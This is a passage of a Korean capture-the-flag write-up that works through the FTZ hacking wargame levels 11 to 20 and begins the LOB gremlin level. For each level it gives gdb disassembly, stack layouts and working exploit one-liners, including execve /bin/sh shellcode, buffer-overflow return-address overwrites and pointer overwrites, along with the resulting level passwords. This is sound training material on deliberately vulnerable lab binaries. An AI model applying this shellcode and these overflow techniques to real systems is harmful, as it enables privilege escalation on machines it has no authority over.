0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1




1 FTZ LEVEL11 #include <stdio.h> #include <stdlib.h> int main( int argc, char *argv[] ) { char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); gdb 를이용해분석해보면 [level11@ftz level11]$ gdb -q attackme (gdb) set disas main Undefined item: "main". (gdb) set disas intel (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x108 0x <main+9>: sub esp,0x8 0x c <main+12>: push 0xc14 0x <main+17>: push 0xc14 0x <main+22>: call 0x804834c <setreuid> 0x b <main+27>: add esp,0x10 0x e <main+30>: sub esp,0x8 0x <main+33>: mov eax,dword PTR [ebp+12] 0x <main+36>: add eax,0x4 0x <main+39>: push DWORD PTR [eax]

2 0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x10 0x080484a8 <main+56>: sub esp,0xc 0x080484ab <main+59>: lea eax,[ebp-264] 0x080484b1 <main+65>: push eax 0x080484b2 <main+66>: call 0x804833c <printf> 0x080484b7 <main+71>: add esp,0x10 0x080484ba <main+74>: leave 0x080484bb <main+75>: ret 0x080484bc <main+76>: nop 0x080484bd <main+77>: nop 0x080484be <main+78>: nop 0x080484bf <main+79>: nop End of assembler dump. main+48에서 <strcpy> 를콜하므로그전에넣을인자값을셋팅해야한다. <strcpy> 의인자값에 str[] 이있기때문에 str의시작은 ebp-264 지점이다. 따라서메모리구조는 str[256] dummy[8] sfp ret 환경변수를이용하여쉘코드를넣고쉘코드의시작주소를 ret에넣으면된다. getenv.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { char *p; p = getenv(argv[1]);

3 if(p!= NULL) { printf("%s=%p\n",argv[1],p); return 0; 이 C 코드는입력한환경변수의주소를알려주는코드이다. 환경변수를추가시키고 [level11@ftz tmp]$ export EGG="`python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`" 환경변수의주소를알아내면 [level11@ftz tmp]$./getenv EGG EGG=0xbffffc37 이제문제를풀면 쓰레기값 \x37\xfc\xff\xbf [level11@ftz level11]$./attackme `python -c "print 'A'*268+'\x37\xfc\xff\xbf'"` sh-2.05b$ my-pass TERM environment variable not set. Level12 Password is "it is like this".

4 FTZ LEVEL12 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main( void ) { char str[256]; setreuid( 3093, 3093 ); printf( " 문장을입력하세요.\n" ); gets( str ); printf( "%s\n", str ); gdb 를이용해분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x108 0x <main+9>: sub esp,0x8 0x c <main+12>: push 0xc15 0x <main+17>: push 0xc15 0x <main+22>: call 0x804835c <setreuid> 0x b <main+27>: add esp,0x10 0x e <main+30>: sub esp,0xc 0x <main+33>: push 0x x <main+38>: call 0x804834c <printf> 0x b <main+43>: add esp,0x10 0x e <main+46>: sub esp,0xc 0x080484a1 <main+49>: lea eax,[ebp-264] 0x080484a7 <main+55>: push eax

5 0x080484a8 <main+56>: call 0x804831c <gets> 0x080484ad <main+61>: add esp,0x10 0x080484b0 <main+64>: sub esp,0x8 0x080484b3 <main+67>: lea eax,[ebp-264] 0x080484b9 <main+73>: push eax 0x080484ba <main+74>: push 0x804854c 0x080484bf <main+79>: call 0x804834c <printf> 0x080484c4 <main+84>: add esp,0x10 0x080484c7 <main+87>: leave 0x080484c8 <main+88>: ret 0x080484c9 <main+89>: lea esi,[esi] 0x080484cc <main+92>: nop 0x080484cd <main+93>: nop 0x080484ce <main+94>: nop 0x080484cf <main+95>: nop End of assembler dump. 메모리구조를그리면 str[256] dummy[8] sfp ret 쓰레기값268 + 쉘주소똑같이환경변수를이용해풀면 (... 생략...) [level12@ftz level12]$ /tmp/ge EGG EGG=0xbffffc3d gets 를이용해입력을받기때문에파이프를이용해야한다. [level12@ftz level12]$ (python -c "print 'A'*268+'\x3d\xfc\xff\xbf'";cat)./attackme 문장을입력하세요. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

6 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=? my-pass TERM environment variable not set. Level13 Password is "have no clue". FTZ LEVEL13 #include <stdlib.h> main(int argc, char *argv[]) { long i=0x ; char buf[1024]; setreuid( 3094, 3094 ); if(argc > 1) strcpy(buf,argv[1]); if(i!= 0x ) { printf(" Warnning: Buffer Overflow!!! \n"); kill(0,11); gdb 를이용히여 (gdb) disas main Dump of assembler code for function main: 0x080484a0 <main+0>: push ebp 0x080484a1 <main+1>: mov ebp,esp 0x080484a3 <main+3>: sub esp,0x418 0x080484a9 <main+9>: mov DWORD PTR [ebp-12],0x x080484b0 <main+16>: sub esp,0x8

7 0x080484b3 <main+19>: push 0xc16 0x080484b8 <main+24>: push 0xc16 0x080484bd <main+29>: call 0x <setreuid> 0x080484c2 <main+34>: add esp,0x10 0x080484c5 <main+37>: cmp DWORD PTR [ebp+8],0x1 0x080484c9 <main+41>: jle 0x80484e5 <main+69> 0x080484cb <main+43>: sub esp,0x8 0x080484ce <main+46>: mov eax,dword PTR [ebp+12] 0x080484d1 <main+49>: add eax,0x4 0x080484d4 <main+52>: push DWORD PTR [eax] 0x080484d6 <main+54>: lea eax,[ebp-1048] 0x080484dc <main+60>: push eax 0x080484dd <main+61>: call 0x <strcpy> 0x080484e2 <main+66>: add esp,0x10 0x080484e5 <main+69>: cmp DWORD PTR [ebp-12],0x x080484ec <main+76>: je 0x804850d <main+109> 0x080484ee <main+78>: sub esp,0xc 0x080484f1 <main+81>: push 0x80485a0 0x080484f6 <main+86>: call 0x <printf> 0x080484fb <main+91>: add esp,0x10 0x080484fe <main+94>: sub esp,0x8 0x <main+97>: push 0xb 0x <main+99>: push 0x0 0x <main+101>: call 0x <kill> 0x a <main+106>: add esp,0x10 0x d <main+109>: leave 0x e <main+110>: ret 0x f <main+111>: nop End of assembler dump. ebp-12 부분이 0x 이아니라면프로그램이종료된다. 따라서환경변 수를이용해쉘코드의주소를구한다음 ebp-12 부분에 0x 를넣어주 면된다.

8 환경변수를이용해주소를구하면 (... 생략...) level13]$ /tmp/ge EGG EGG=0xbffffc3d 메모리구조를보면 buf[1024] dummy[12] i[4] dummy[8] sfp ret 쓰레기값 \x67\x45\x23\x01 + 쓰레기값12 + 쉘주소공격을하면 [level13@ftz level13]$./attackme `python -c "print 'A'*1036+'\x67\x45\x23\x01'+'A'*12+'\x3d\xfc\xff\xbf'"` sh-2.05b$ my-pass TERM environment variable not set. Level14 Password is "what that nigga want?". FTZ LEVEL14 #include <stdio.h> #include <unistd.h> main() { int crap; int check; char buf[20]; fgets(buf,45,stdin); if (check==0xdeadbeef) { setreuid(3095,3095); system("/bin/sh"); C 언어코드를보니 fgets 를이용하여입력을받는데 45byte 만큼의데이터를 받아버퍼오버플로우가일어난다. 그리고 if 문에서 deadbeef 를검사한

9 다. gdb를이용하여분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x38 0x <main+6>: sub esp,0x4 0x <main+9>: push ds:0x x f <main+15>: push 0x2d 0x080484a1 <main+17>: lea eax,[ebp-56] 0x080484a4 <main+20>: push eax 0x080484a5 <main+21>: call 0x <fgets> 0x080484aa <main+26>: add esp,0x10 0x080484ad <main+29>: cmp DWORD PTR [ebp-16],0xdeadbeef 0x080484b4 <main+36>: jne 0x80484db <main+75> 0x080484b6 <main+38>: sub esp,0x8 0x080484b9 <main+41>: push 0xc17 0x080484be <main+46>: push 0xc17 0x080484c3 <main+51>: call 0x <setreuid> 0x080484c8 <main+56>: add esp,0x10 0x080484cb <main+59>: sub esp,0xc 0x080484ce <main+62>: push 0x x080484d3 <main+67>: call 0x <system> 0x080484d8 <main+72>: add esp,0x10 0x080484db <main+75>: leave 0x080484dc <main+76>: ret 0x080484dd <main+77>: lea esi,[esi] End of assembler dump. fgets의인자중에 buf가있으므로 main+17부분에서 buf를불러온다. 이때 buf의시작은 ebp-56인것을알수있다. main+29 부분에서 ebp-16과 deadbeef 를비교하므로 ebp-16부분에 deadbeef 를넣으면쉘을딸수있다.

10 메모리구조를그려보면 buf[20] dummy[20] deadbeef dummy[12] sfp ret 쓰레기값40 + \xef\xbe\xad\xde 공격을하면 [level14@ftz level14]$ (python -c "print 'A'*40+'\xef\xbe\xad\xde'";cat)./attackme my-pass Level15 Password is "guess what". FTZ LEVEL15 #include <stdio.h> main() { int crap; int *check; char buf[20]; fgets(buf,45,stdin); if (*check==0xdeadbeef) { setreuid(3096,3096); system("/bin/sh"); 전문제와굉장히비슷한문제인데다른점이 check 가포인터가되었다는 것이다 그래도 gdb 로분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp

11 0x <main+3>: sub esp,0x38 0x <main+6>: sub esp,0x4 0x <main+9>: push ds:0x x f <main+15>: push 0x2d 0x080484a1 <main+17>: lea eax,[ebp-56] 0x080484a4 <main+20>: push eax 0x080484a5 <main+21>: call 0x <fgets> 0x080484aa <main+26>: add esp,0x10 0x080484ad <main+29>: mov eax,dword PTR [ebp-16] 0x080484b0 <main+32>: cmp DWORD PTR [eax],0xdeadbeef 0x080484b6 <main+38>: jne 0x80484dd <main+77> 0x080484b8 <main+40>: sub esp,0x8 0x080484bb <main+43>: push 0xc18 0x080484c0 <main+48>: push 0xc18 0x080484c5 <main+53>: call 0x <setreuid> 0x080484ca <main+58>: add esp,0x10 0x080484cd <main+61>: sub esp,0xc 0x080484d0 <main+64>: push 0x x080484d5 <main+69>: call 0x <system> 0x080484da <main+74>: add esp,0x10 0x080484dd <main+77>: leave 0x080484de <main+78>: ret 0x080484df <main+79>: nop End of assembler dump. level14와다똑같은데 main+29지점에서주소에있는값을비교하므로메모리안에있는 deadbeef를 ebp-16이그곳을가리키도록주소를넣어주면된다. 메모리구조를그려보면 buf[20] dummy[20] deadbeef의주소값 dummy[12] sfp ret 쓰레기값40 + deadbeef의주소값 이번공격에서는 cmp 로비교하는구문근처에서 deadbeef 을찾아시작주소 를 ebp-16 지점에넣겠다.

12 (gdb) x/16x 0x080484b0 0x80484b0 <main+32>: 0xbeef3881 0x2575dead 0x6808ec83 0x00000c18 0x80484c0 <main+48>: 0x000c1868 0xfeb6e800 0xc483ffff 0x0cec8310 0x80484d0 <main+64>: 0x xfe66e808 0xc483ffff 0x90c3c910 (gdb) x/16x 0x080484b2 0x80484b2 <main+34>: 0xdeadbeef 0xec x0c x x80484c2 <main+50>: 0xe800000c 0xfffffeb6 0x8310c483 0x48680cec 0x80484d2 <main+66>: 0xe xfffffe66 0xc910c483 0x895590c3 deadbeef 의주소가 0x080484b2 라는것을알았다. 공격을하면 level15]$ (python -c "print 'A'*40+'\xb2\x84\x04\x08'";cat)./attackme my-pass Level16 Password is "about to cause mass". FTZ LEVEL16 #include <stdio.h> void shell() { setreuid(3097,3097); system("/bin/sh"); void printit() { printf("hello there!\n"); main() { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); call(); shell() 함수의시작주소를 call() 함수를호출하는곳에넣으면쉘을획득할수있을것같다.

13 gdb 를이용해서분석을해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x b <main+3>: sub esp,0x38 0x e <main+6>: mov DWORD PTR [ebp-16],0x x <main+13>: sub esp,0x4 0x <main+16>: push ds:0x80496e8 0x e <main+22>: push 0x30 0x <main+24>: lea eax,[ebp-56] 0x <main+27>: push eax 0x <main+28>: call 0x <fgets> 0x <main+33>: add esp,0x10 0x c <main+36>: mov eax,dword PTR [ebp-16] 0x f <main+39>: call eax 0x <main+41>: leave 0x <main+42>: ret 0x <main+43>: nop 0x <main+44>: nop 0x <main+45>: nop 0x <main+46>: nop 0x <main+47>: nop 0x <main+48>: nop 0x <main+49>: nop 0x a <main+50>: nop 0x b <main+51>: nop 0x c <main+52>: nop 0x d <main+53>: nop 0x e <main+54>: nop 0x f <main+55>: nop End of assembler dump. buf의시작주소는 ebp-56이고, main+6 부분에서 printit 함수의주소를 ebp-16부분에넣고있고, main+36에서 ebp-16부분에있는값을 eax에넣고 call 한다. 따라서 ebp-16부분에 shell() 함수의시작주소를넣고익스플로잇하겠다.

14 (gdb) disas shell Dump of assembler code for function shell: 0x080484d0 <shell+0>: push ebp 0x080484d1 <shell+1>: mov ebp,esp 0x080484d3 <shell+3>: sub esp,0x8 0x080484d6 <shell+6>: sub esp,0x8 0x080484d9 <shell+9>: push 0xc19 0x080484de <shell+14>: push 0xc19 0x080484e3 <shell+19>: call 0x80483b4 <setreuid> 0x080484e8 <shell+24>: add esp,0x10 0x080484eb <shell+27>: sub esp,0xc 0x080484ee <shell+30>: push 0x80485b8 0x080484f3 <shell+35>: call 0x <system> 0x080484f8 <shell+40>: add esp,0x10 0x080484fb <shell+43>: leave 0x080484fc <shell+44>: ret 0x080484fd <shell+45>: lea esi,[esi] End of assembler dump. shell 의시작주소는 0x080484d0 이다. 쓰레기값 40 + shell() 의시작주소 공격을하면 [level16@ftz level16]$ (python -c "print 'A'*40+'\xd0\x84\x04\x08'";cat)./attackme my-pass Level17 Password is "king poetic". FTZ LEVEL17 #include <stdio.h> void printit() { printf("hello there!\n"); main()

15 { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); setreuid(3098,3098); call(); 저번문제와달리 shell() 함수가없어져서직접쉘코드를환경변수에올려서 call() 함수를호출하는부분을 shellcode의시작주소로바꾸겠다. 환경변수를올려주소를찾아보겠다. 주소를찾는코드는위에있으니참고해서구하겠다. level17]$ export EGG="`python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`" level17]$ /tmp/ge EGG EGG=0xbffffc3d 그럼이제 gdb 를이용해서분석해보면 (gdb) disas main Dump of assembler code for function main: 0x080484a8 <main+0>: push ebp 0x080484a9 <main+1>: mov ebp,esp 0x080484ab <main+3>: sub esp,0x38 0x080484ae <main+6>: mov DWORD PTR [ebp-16],0x x080484b5 <main+13>: sub esp,0x4 0x080484b8 <main+16>: push ds:0x804967c 0x080484be <main+22>: push 0x30 0x080484c0 <main+24>: lea eax,[ebp-56] 0x080484c3 <main+27>: push eax 0x080484c4 <main+28>: call 0x <fgets> 0x080484c9 <main+33>: add esp,0x10 0x080484cc <main+36>: sub esp,0x8 0x080484cf <main+39>: push 0xc1a 0x080484d4 <main+44>: push 0xc1a 0x080484d9 <main+49>: call 0x <setreuid> 0x080484de <main+54>: add esp,0x10 0x080484e1 <main+57>: mov eax,dword PTR [ebp-16] 0x080484e4 <main+60>: call eax

16 0x080484e6 <main+62>: leave 0x080484e7 <main+63>: ret 0x080484e8 <main+64>: nop 0x080484e9 <main+65>: nop 0x080484ea <main+66>: nop 0x080484eb <main+67>: nop 0x080484ec <main+68>: nop 0x080484ed <main+69>: nop 0x080484ee <main+70>: nop 0x080484ef <main+71>: nop End of assembler dump. printit() 함수의주소가 ebp-16에올라가고, buf는 ebp-56에올라간다. 따라서환경변수의주소를 ebp-16에넣어주면쉽게풀릴것같다. 쓰레기값 40 + 환경변수주소 공격을하면 [level17@ftz level17]$ (python -c "print 'A'*40+'\x3d\xfc\xff\xbf'";cat)./attackme my-pass TERM environment variable not set. Level18 Password is "why did you do it". FTZ LEVEL18 #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> void shellout(void); int main() { char string[100]; int check; int x = 0; int count = 0; fd_set fds; printf("enter your command: "); fflush(stdout); while(1)

17 { if(count >= 100) printf("what are you trying to do?\n"); if(check == 0xdeadbeef) shellout(); else { FD_ZERO(&fds); FD_SET(STDIN_FILENO,&fds); if(select(FD_SETSIZE, &fds, NULL, NULL, NULL) >= 1) { if(FD_ISSET(fileno(stdin),&fds)) { read(fileno(stdin),&x,1); switch(x) { case '\r': case '\n': printf("\a"); break; case 0x08: count--; printf("\b \b"); break; default: string[count] = x; count++; break; void shellout(void) { setreuid(3099,3099); execl("/bin/sh","sh",NULL);

18 여러 c코드들이있지만 string 배열보다 check가늦게선언되어스택의특성상 check 부분을원하는값으로덮는것이불가능하다. 하지만 case문에서 0x08이 count를 감소시켜 주고, default에서 string[count] 에 x를넣어준다. 따라서 count를음수로잡으면 string전에있는메모리도변조할수있을것이다. gdb 를이용해분석을해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x100 0x <main+9>: push edi 0x a <main+10>: push esi 0x b <main+11>: push ebx 0x c <main+12>: mov DWORD PTR [ebp-108],0x0 0x <main+19>: mov DWORD PTR [ebp-112],0x0 0x a <main+26>: push 0x x f <main+31>: call 0x <printf> 0x <main+36>: add esp,0x4 0x <main+39>: mov eax,ds:0x804993c 0x c <main+44>: mov DWORD PTR [ebp-252],eax 0x <main+50>: mov ecx,dword PTR [ebp-252] 0x <main+56>: push ecx 0x <main+57>: call 0x <fflush> 0x e <main+62>: add esp,0x4 0x <main+65>: jmp 0x <main+72> 0x <main+67>: jmp 0x <main+549> 0x <main+72>: cmp DWORD PTR [ebp-112],0x63 0x c <main+76>: jle 0x80485ab <main+91> 0x e <main+78>: push 0x x080485a3 <main+83>: call 0x <printf> 0x080485a8 <main+88>: add esp,0x4 0x080485ab <main+91>: cmp DWORD PTR [ebp-104],0xdeadbeef 0x080485b2 <main+98>: jne 0x80485c0 <main+112> 0x080485b4 <main+100>: call 0x <shellout> 0x080485b9 <main+105>: jmp 0x <main+544>

19 0x080485be <main+110>: mov esi,esi 0x080485c0 <main+112>: lea edi,[ebp-240] 0x080485c6 <main+118>: mov DWORD PTR [ebp-252],edi 0x080485cc <main+124>: mov ecx,0x20 0x080485d1 <main+129>: mov edi,dword PTR [ebp-252] 0x080485d7 <main+135>: xor eax,eax 0x080485d9 <main+137>: cld 0x080485da <main+138>: repz stos es:[edi],eax 0x080485dc <main+140>: mov DWORD PTR [ebp-244],ecx ---Type <return> to continue, or q <return> to quit--- 0x080485e2 <main+146>: mov DWORD PTR [ebp-248],edi 0x080485e8 <main+152>: jmp 0x80485f2 <main+162> 0x080485ea <main+154>: lea esi,[esi] 0x080485f0 <main+160>: jmp 0x80485c0 <main+112> 0x080485f2 <main+162>: xor eax,eax 0x080485f4 <main+164>: bts DWORD PTR [ebp-240],eax 0x080485fb <main+171>: push 0x0 0x080485fd <main+173>: push 0x0 0x080485ff <main+175>: push 0x0 0x <main+177>: lea ecx,[ebp-240] 0x <main+183>: mov DWORD PTR [ebp-252],ecx 0x d <main+189>: mov edi,dword PTR [ebp-252] 0x <main+195>: push edi 0x <main+196>: push 0x400 0x <main+201>: call 0x <select> 0x e <main+206>: add esp,0x14 0x <main+209>: mov DWORD PTR [ebp-252],eax 0x <main+215>: cmp DWORD PTR [ebp-252],0x0 0x e <main+222>: jle 0x <main+544> 0x <main+228>: mov eax,ds:0x x <main+233>: mov DWORD PTR [ebp-252],eax 0x f <main+239>: mov ecx,dword PTR [ebp-252] 0x <main+245>: push ecx 0x <main+246>: call 0x <fileno> 0x b <main+251>: add esp,0x4 0x e <main+254>: mov DWORD PTR [ebp-252],eax 0x <main+260>: mov esi,dword PTR [ebp-252] 0x a <main+266>: and esi,0x1f 0x d <main+269>: mov edi,ds:0x x <main+275>: mov DWORD PTR [ebp-252],edi

20 0x <main+281>: mov eax,dword PTR [ebp-252] 0x f <main+287>: push eax 0x <main+288>: call 0x <fileno> 0x <main+293>: add esp,0x4 0x <main+296>: mov DWORD PTR [ebp-252],eax 0x e <main+302>: mov edx,dword PTR [ebp-252] 0x <main+308>: shr edx,0x5 0x <main+311>: lea ecx,[edx*4] ---Type <return> to continue, or q <return> to quit--- 0x e <main+318>: mov DWORD PTR [ebp-252],ecx 0x <main+324>: lea edx,[ebp-240] 0x a <main+330>: mov edi,dword PTR [ebp-252] 0x080486a0 <main+336>: bt DWORD PTR [edi+edx],esi 0x080486a4 <main+340>: setb bl 0x080486a7 <main+343>: test bl,bl 0x080486a9 <main+345>: je 0x <main+544> 0x080486af <main+351>: push 0x1 0x080486b1 <main+353>: lea eax,[ebp-108] 0x080486b4 <main+356>: mov DWORD PTR [ebp-252],eax 0x080486ba <main+362>: mov ecx,dword PTR [ebp-252] 0x080486c0 <main+368>: push ecx 0x080486c1 <main+369>: mov edi,ds:0x x080486c7 <main+375>: mov DWORD PTR [ebp-252],edi 0x080486cd <main+381>: mov eax,dword PTR [ebp-252] 0x080486d3 <main+387>: push eax 0x080486d4 <main+388>: call 0x <fileno> 0x080486d9 <main+393>: add esp,0x4 0x080486dc <main+396>: mov DWORD PTR [ebp-252],eax 0x080486e2 <main+402>: mov ecx,dword PTR [ebp-252] 0x080486e8 <main+408>: push ecx 0x080486e9 <main+409>: call 0x <read> 0x080486ee <main+414>: add esp,0xc 0x080486f1 <main+417>: mov edi,dword PTR [ebp-108] 0x080486f4 <main+420>: mov DWORD PTR [ebp-252],edi 0x080486fa <main+426>: cmp DWORD PTR [ebp-252],0xa 0x <main+433>: je 0x <main+466> 0x <main+435>: cmp DWORD PTR [ebp-252],0xa 0x a <main+442>: jg 0x <main+455> 0x c <main+444>: cmp DWORD PTR [ebp-252],0x8 0x <main+451>: je 0x <main+481>

21 0x <main+453>: jmp 0x <main+499> 0x <main+455>: cmp DWORD PTR [ebp-252],0xd 0x e <main+462>: je 0x <main+466> 0x <main+464>: jmp 0x <main+499> 0x <main+466>: push 0x x <main+471>: call 0x <printf> 0x c <main+476>: add esp,0x4 ---Type <return> to continue, or q <return> to quit--- 0x f <main+479>: jmp 0x <main+544> 0x <main+481>: dec DWORD PTR [ebp-112] 0x <main+484>: push 0x x <main+489>: call 0x <printf> 0x e <main+494>: add esp,0x4 0x <main+497>: jmp 0x <main+544> 0x <main+499>: lea eax,[ebp-100] 0x <main+502>: mov DWORD PTR [ebp-252],eax 0x c <main+508>: mov edx,dword PTR [ebp-112] 0x f <main+511>: mov cl,byte PTR [ebp-108] 0x <main+514>: mov BYTE PTR [ebp-253],cl 0x <main+520>: mov al,byte PTR [ebp-253] 0x e <main+526>: mov ecx,dword PTR [ebp-252] 0x <main+532>: mov BYTE PTR [edx+ecx],al 0x <main+535>: inc DWORD PTR [ebp-112] 0x a <main+538>: jmp 0x <main+544> 0x c <main+540>: lea esi,[esi*1] 0x <main+544>: jmp 0x <main+65> 0x <main+549>: lea esp,[ebp-268] 0x b <main+555>: pop ebx 0x c <main+556>: pop esi 0x d <main+557>: pop edi 0x e <main+558>: leave 0x f <main+559>: ret End of assembler dump. 코드가긴만큼어셈코드도굉장히길다. 하지만우리에게필요한것은 string의시작, check의시작, shellout() 함수의시작부분이다. 우선우리가필요한코드만잘라보겠다. 0x b <main+11>: push ebx 0x c <main+12>: mov DWORD PTR [ebp-108],0x0 0x <main+19>: mov DWORD PTR [ebp-112],0x0 0x a <main+26>: push 0x

22 ebp-108 부분과 ebp-112 부분을 0 으로초기화시키고있다. c 코드와비교해서 보면 ebp-108 는 x 이고,ebp-112 는 count 라는것을알수있다. 0x080485a3 <main+83>: call 0x <printf> 0x080485a8 <main+88>: add esp,0x4 0x080485ab <main+91>: cmp DWORD PTR [ebp-104],0xdeadbeef 0x080485b2 <main+98>: jne 0x80485c0 <main+112> 0x080485b4 <main+100>: call 0x <shellout> deadbeef에서비교하는 main+91 부분에서 check가 ebp-104부분이라는것을알았다. 0x <main+499>: lea eax,[ebp-100] 0x <main+502>: mov DWORD PTR [ebp-252],eax 0x c <main+508>: mov edx,dword PTR [ebp-112] 0x f <main+511>: mov cl,byte PTR [ebp-108] 0x <main+514>: mov BYTE PTR [ebp-253],cl 0x <main+520>: mov al,byte PTR [ebp-253] 0x e <main+526>: mov ecx,dword PTR [ebp-252] 0x <main+532>: mov BYTE PTR [edx+ecx],al 0x <main+535>: inc DWORD PTR [ebp-112] 0x a <main+538>: jmp 0x <main+544> switch문안에있는 default문이다. 여기서 string이 ebp-100에위치한다는것을알았다. eax에 string을넣고, string을다시 ebp-252부분에넣는다. 그다음 count를 edx에넣고, x를 cl에넣는다. 현재 eax와 ebp-252 부분에는 string이, edx에는 count가, cl에는 x가들어가있다. 그다음 cl을 ebp-253에넣고다시 ebp-253을 al에넣는다. 다음 ebp-252를 ecx에넣는다. 그럼현재 eax와 ebp-252,ecx 부분에는 string이, edx에는 count가, cl, ebp-253, al에는 x가들어가있다. main+532 부분에서 string의 count 번째수에 x를넣어준다. 어셈블리어에서배열에값을넣을때는어셈명령어 mov를쓰고넣는값의크기에따라 1byte면 BYTE PTR, 2byte면 WORD PTR,4byte면 DWORD PTR라고쓴다. 그다음 [ 넣는번째 + 배열이름 ], 넣는값형식으로쓴다. 여태까지수집한정보를정리하면 string : ebp-100, count : ebp-112, x : ebp-108,

23 check : ebp-104 string 에입력을받을때 count 를 4 줄이고그부분에 deadbeef 를넣으면되 겠다. \x08 * 4 + shellout() 함수의시작주소 공격을해보겠다. [level18@ftz level18]$ (python -c "print '\x08'*4+'\xef\xbe\xad\xde'";cat)./attackme Enter your command: id uid=3099(level19) gid=3098(level18) groups=3098(level18) my-pass Level19 Password is "swimming in pink". FTZ LEVEL19 main() { char buf[20]; gets(buf); printf("%s\n",buf); 코드가굉장히간단하다. 하지만그전까지는 c코드에서권한상승을 setreuid를해주었다. 하지만이코드에는권한상승이없다. 여태까지사용했던쉘코드는단순히 /bin/sh 명령어를실행시켜주는것이였으므로 setreuid+/bin/sh 를해주는쉘코드를사용하겠다. 사용한쉘코드는이것이다. \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2 f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 이쉘코드를환경변수에올린다음주소로 ret 를덮겠다. 환경변수를등록해주소를아는과정은생략하겠다. 앞에나온 level 의과 정을따라하면된다.

24 gdb 를이용해분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x28 0x <main+6>: sub esp,0xc 0x <main+9>: lea eax,[ebp-40] 0x c <main+12>: push eax 0x d <main+13>: call 0x80482f4 <gets> 0x <main+18>: add esp,0x10 0x <main+21>: sub esp,0x8 0x <main+24>: lea eax,[ebp-40] 0x b <main+27>: push eax 0x c <main+28>: push 0x80484d8 0x <main+33>: call 0x <printf> 0x <main+38>: add esp,0x10 0x <main+41>: leave 0x a <main+42>: ret 0x b <main+43>: nop 0x c <main+44>: nop 0x d <main+45>: nop 0x e <main+46>: nop 0x f <main+47>: nop End of assembler dump. buf 의위치가 ebp-40 이라는것을알았다. 쓰레기값 44 + 환경변수 EGG 의주소 공격을해보면 [level19@ftz level19]$ (python -c "print 'A'*44+'\x2d\xfc\xff\xbf'";cat)./attackme AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-? my-pass TERM environment variable not set. Level20 Password is "we are just regular guys".

25 FTZ LEVEL20 #include <stdio.h> main(int argc,char **argv) { char bleh[80]; setreuid(3101,3101); fgets(bleh,79,stdin); printf(bleh); bleh의크기가 80인데 fgets를이용해서 79만큼을입력받는다. 따라서 bof 공격은아니라는것을알았다. 이번문제는포맷스트링버그를이용한공격인것같다. printf() 함수가 별도의 서식 문자열 없이 사용자 입력(bleh)을 그대로 서식 인자로 넘겨 출력하고 있다. LOB (gate -> gremlin) /* */ The Lord of the BOF : The Fellowship of the BOF - gremlin - simple BOF int main(int argc, char *argv[]) { char buffer[256]; if(argc < 2){ printf("argv error\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); 전형적인 BOF 문제이다. main함수의인자가 2개 미만이면프로그램이종료된다. 환경변수에쉘코드를넣은후 buffer와 sfp를덮고환경변수의주소로 ret를덮겠다. 환경변수를넣는것은많이했으므로따로설명하지는않겠다. 위에있다. [gate@localhost gate]$ /tmp/ge EGG

